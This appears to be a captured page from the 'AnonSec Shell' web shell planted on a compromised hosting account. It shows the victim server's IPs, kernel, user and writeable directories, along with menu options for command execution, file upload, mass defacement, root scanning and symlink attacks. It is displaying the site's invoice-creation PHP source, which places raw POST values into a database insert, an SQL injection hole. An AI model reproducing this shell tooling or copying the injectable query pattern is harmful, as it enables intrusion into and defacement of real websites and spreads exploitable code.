AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 104.23.243.32   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/ilawasia.onnud20.com/Invoice/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/ilawasia.onnud20.com/Invoice/Create.php
<?php
$ck='not';
include("../include/checkLogin.php");
include("../include/class.php");
include("../include/table_name.php");
$date_year = date("Y");
$date_month = date("m");
require_once("../class/coreClass.php");
$core_db = new coreClass;
/*
  echo "<pre>";
  print_r($_SESSION);
  echo "</pre>";
  echo "<pre>";
  print_r($_FILES['File']);
  echo "</pre>";

  exit();
  echo "<pre>";
  print_r($_POST);
  echo "</pre>";
*/
if(@$_POST['IsExcludeVat']!=1){
  $GenDoc = 3;
}else{
  $GenDoc = $_POST['IsExcludeVat'];
}
$GenInvoiceFormatNumber = $core_db->GenInvoiceFormatNumber($GenDoc,$isUpdate = "true");
$GenInvoiceFormatNumber = $GenInvoiceFormatNumber['gdn'];
if(@$_POST['IsCo']==1){
  $GenInvoiceFormatNumber = $GenInvoiceFormatNumber ."CO";
}
$BillDetail = trim(@$_POST['BillDetail']);
$list = array(
  'table'=>$name_table12,
  'QuotationId'=>"'".@$_POST["QuotationId"]."'",
  'CustomerId'=>"'".@$_POST["CustomerId"]."'",
  'Vat'=>"'".@$_POST["Vat"]."'",
  'Tax'=>"'".@$_POST["Tax"]."'",
  'InvoiceNo'=>"'".@$GenInvoiceFormatNumber."'",
  'IsConsultService'=>"'".@$_POST['IsConsultService']."'",
  'BillDetail'=>"'".@$BillDetail."'",
  'IsWitholdingTax'=>"'".@$_POST['IsWitholdingTax']."'",
  'CreateBy'=>"'".@$_SESSION["UserInfo"][0]['UserId']."'",
  'CreateDateTime'=>"'".@$date."'",
  'IsExcludeVat'=>"'".@$_POST['IsExcludeVat']."'",
  'IsCo'=>"'".@$_POST['IsCo']."'",
  'ResponseId'=>"'".@$_POST['ResponseId']."'"
);
$add = $actiondata_db->add_db($list);
/*
echo "<pre>";
print_r($add);
echo "</pre>";
*/
if(@$add['suc']==1){
  $sql = array('table'=>$name_table12,'count'=>'MAX(InvoiceId) AS max_id','where'=>"");
  $view_sql = $view_db->view($sql);
  $row = $view_db->q($view_sql);
  $InvoiceId = $row['max_id'];

  $_SESSION["Success"] = "Add Invoice Successful.";
  echo "<script>window.location.href='Edit.php?Id=".$InvoiceId."&Type=Edit'</script>";
}else{
  $_SESSION["Error"] = "false";
  echo "<script>window.location.href='index.php'</script>";
}




?>

Anon7 - 2022
AnonSec Team